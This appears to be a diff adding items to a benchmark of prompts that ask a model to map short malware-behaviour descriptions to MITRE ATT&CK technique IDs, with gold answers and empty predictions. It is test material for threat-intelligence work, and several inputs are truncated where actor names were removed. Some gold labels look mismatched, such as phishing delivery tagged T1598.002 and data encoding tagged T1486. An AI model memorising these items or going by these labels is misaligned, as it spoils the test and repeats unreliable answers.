+ "input": "searches for interesting files (either a default or customized set of file extensions) on the local system. will scan the My Recent Documents, Desktop, Temporary Internet Files, and TEMP directories. also collects information stored in the Windows Address Book.",
+ "gold": [
+ "T1005"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "searches through connected drives for removable storage devices.",
+ "gold": [
+ "T1120"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "searches through the drive containing the OS, then all drive letters C through to Z, for documents matching certain extensions.",
+ "gold": [
+ "T1083"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "selective infector modifies executables stored on removable media as a method of spreading across computers.",
+ "gold": [
+ "T1091"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "sends collected files back over same C2 channel.",
+ "gold": [
+ "T1041"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "sent emails to victims with malicious Microsoft Office documents attached.",
+ "gold": [
+ "T1598.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "sent spearphishing emails with malicious attachments in RTF and XLSM formats to deliver initial exploits.",
+ "gold": [
+ "T1598.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Several commands are supported by the 's implant via the command-line interface and there\u2019s also a utility to execute any custom command on an infected endpoint.",
+ "gold": [
+ "T1059"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Several malware families gather a list of running processes on a victim system and send it to their C2 server. A Destover-like variant used by also gathers process times.",
+ "gold": [
+ "T1057"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Some samples encrypt C2 communications with RC4.",
+ "gold": [
+ "T1573"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Some strings are base64 encoded, such as the embedded DLL known as MockDll.",
+ "gold": [
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Some variants add new services with display names generated by a list of hard-coded strings such as Application, Background, Security, and Windows, presumably as a way to masquerade as a legitimate service.",
+ "gold": [
+ "T1036"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Some variants establish persistence by modifying the Registry key HKU\\\\Software\\Microsoft\\Windows\\CurrentVersion\\Run:%appdata%\\NeutralApp\\NeutralApp.exe.",
+ "gold": [
+ "T1547.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Some variants incorporate an MBR rootkit.",
+ "gold": [
+ "T1542.003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Some variants use port 8088 for C2.",
+ "gold": [
+ "T1571"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "stage 1 modules for 64-bit systems have been found to be signed with fake certificates masquerading as originating from Microsoft Corporation and Broadcom Corporation.",
+ "gold": [
+ "T1553.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "\"stages data it copies from the local system or removable drives in the \"\"%WINDIR%\\$NtUninstallKB885884$\\\"\" directory.\"",
+ "gold": [
+ "T1074"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "steals credentials stored inside Internet Explorer.",
+ "gold": [
+ "T1003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "steals user files from removable media with file extensions and keywords that match a predefined list.",
+ "gold": [
+ "T1025"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "stole domain credentials from Microsoft Active Directory Domain Controller and leveraged .",
+ "gold": [
+ "T1003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "stores configuration items in alternate data streams (ADSs) if the Registry is not accessible.",
+ "gold": [
+ "T1564.004"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "strings, network data, configuration, and modules are encrypted with a modified RC4 algorithm.",
+ "gold": [
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "supports peer connections.",
+ "gold": [
+ "T1090"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "surveys a system upon check-in to discover running processes using the tasklist /v command.",
+ "gold": [
+ "T1057"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "takes a screenshot of the screen and displays it on top of all other windows for few seconds in an apparent attempt to hide some messages showed by the system during the setup process.",
+ "gold": [
+ "T1113"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "takes periodic screenshots and exfiltrates them.",
+ "gold": [
+ "T1113"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "takes screenshots of the user's desktop.",
+ "gold": [
+ "T1113"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "terminates antimalware processes.",
+ "gold": [
+ "T1562.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "tests if it can reach its C2 server by first attempting a direct connection, and if it fails, obtaining proxy settings and sending the connection through a proxy, and finally injecting code into a running browser if the proxy method fails.",
+ "gold": [
+ "T1008"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The backdoor is a Web shell that supports server payloads for many different kinds of server-side scripting languages and contains functionality to access files, connect to a database, and open a virtual command prompt.",
+ "gold": [
+ "T1505.003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The C2 server used by provides a port number to the victim to use as a fallback in case the connection closes on the currently used port.",
+ "gold": [
+ "T1008"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The credential dumper contains an implementation of an SSP.",
+ "gold": [
+ "T1547.005"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The credential dumper has been extended to include Skeleton Key domain controller authentication bypass functionality. The LSADUMP::ChangeNTLM and LSADUMP::SetNTLM modules can also manipulate the password hash of an account without knowing the clear text value.",
+ "gold": [
+ "T1098"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The executable version of has a module to log clipboard contents.",
+ "gold": [
+ "T1115"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The group is known to have used RDP during operations.",
+ "gold": [
+ "T1021.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The malware platform uses Extended Attributes to store encrypted executables.",
+ "gold": [
+ "T1564.004"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The malware uses custom Base64 encoding schemes to obfuscate data command and control traffic in the message body of HTTP requests.",
+ "gold": [
+ "T1001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "the victim's internal network for hosts with ports 8080, 5900, and 40 open.",
+ "gold": [
+ "T1046"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "To move laterally on a victim network, has used credentials stolen from various systems on which it gathered usernames and password hashes.",
+ "gold": [
+ "T1078"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Tools used by are capable of downloading and executing additional payloads.",
+ "gold": [
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "TRINITY malware used by encodes data gathered from the victim with a simple substitution cipher and single-byte XOR using the OxAA key.",
+ "gold": [
+ "T1486"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "uploads files from a specified directory to the C2 server.",
+ "gold": [
+ "T1005"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "used an HTTP malware variant and a Port 22 malware variant to collect the MAC address and IP address from the victim\u2019s machine.",
+ "gold": [
+ "T1016"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "used an open-source tool, Phishery, to inject malicious remote template URLs into Microsoft Word documents and then sent them to victims to enable .",
+ "gold": [
+ "T1221"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "used a proxy server between victims and the C2 server.",
+ "gold": [
+ "T1090"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "used a signed credential-dumping tool to obtain victim account credentials.",
+ "gold": [
+ "T1003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "used a tool called MailSniper to search through the Exchange server mailboxes for keywords.",
+ "gold": [
+ "T1114"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "used a valid AppleDeveloperID to sign the code to get past security restrictions.",
+ "gold": [
+ "T1553.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "used batch scripts to enumerate administrators in the environment.",
+ "gold": [
+ "T1069"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "used HTTP for C2 communications. also used an HTTP malware variant to communicate over HTTP for C2.",
+ "gold": [
+ "T1071"
+ ],
+ "predicted": ""
+ },
+ {
